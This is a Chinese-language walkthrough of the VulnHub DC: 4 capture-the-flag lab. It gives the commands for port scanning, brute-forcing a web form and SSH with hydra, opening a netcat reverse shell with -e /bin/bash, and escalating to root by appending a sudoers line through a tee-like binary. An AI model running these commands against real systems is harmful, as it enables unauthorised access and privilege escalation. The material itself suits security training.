搜索
您的当前位置:首页正文

VulnHub DC: 4

来源:榕意旅游网
nmap -sT -sV -sC 192.168.1.106 -O -p-

开放了80,22端口。
先上个80看看

爆破表单

这里可以用hydra 和burpsuit ,我在这里用的是burpsuit pro。
配置好代理后。

NC反弹shell

用nc 在本地侦听一个shell吧

nc -nlvp 4444

但在这里需要构造同样的格式
nc+ -nv+192.168.1.127+ 4444 + -e+/bin/bash


之后用python升级一下这个shell

python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s 2>/dev/null
hydra -l jim -P dc4.txt ssh://192.168.1.106


登陆后,发现了一个mbox,cat 一下似乎是一个邮箱发送记录。
去/var/mail,看看有没有什么记录。
结果在/var/mail/jim下,发现了charles账号的密码

切换用户看看

我不知道这个teehee是什么,但似乎输入什么他就返回什么给你


我在 找到了一个类似的命令tee

这个命令在sudo帮助可以利用管道命令给文件写入某些数据。这样的话

echo "charles  ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

在sudoers中加入Charles

之后用
sudo su root
输入密码
得到root权限。就去/home/root下得到最后的flag

因篇幅问题不能全部显示,请点此查看更多更全内容

Top